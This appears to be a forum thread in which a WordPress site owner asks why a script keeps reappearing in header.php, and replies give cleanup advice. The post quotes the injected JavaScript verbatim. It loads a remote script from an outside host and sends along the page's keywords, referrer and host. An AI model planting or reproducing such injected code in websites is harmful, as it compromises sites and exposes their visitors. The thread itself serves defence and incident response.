My website is a wordpress site. the following code appears in Header.php every few hours , when I delete it, it appears again after few hours. Please note that the link in the code âshiro-maga.comâ changes everytime. The code is following:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://shiro-maga.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://shiro-maga.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
I believe that the theme is infected ” scan show no malware” so it generate this script . could you please advise how to find the source of this script?
Thanks
Definitely malicious. Your site has been compromised. You can use the following detailed article to find and remove the source of the infection. http://ottopress.com/2009/hacked-wordpress-backdoors/. A program like Windows Grep will help you run a quick scan on all your theme files for keywords like eval and base64. Remove all suspicious stings of code from your theme and then update the WordPress core files to ensure you are running a clean version. Alternatively, if you have a backup, restore your theme’s backup and update your site with a clean updated version of WP.
A quick fix to prevent reinfection is to CHMOD header.php to 444 (read only). Site will work and will not be reinfected giving you time to find infection.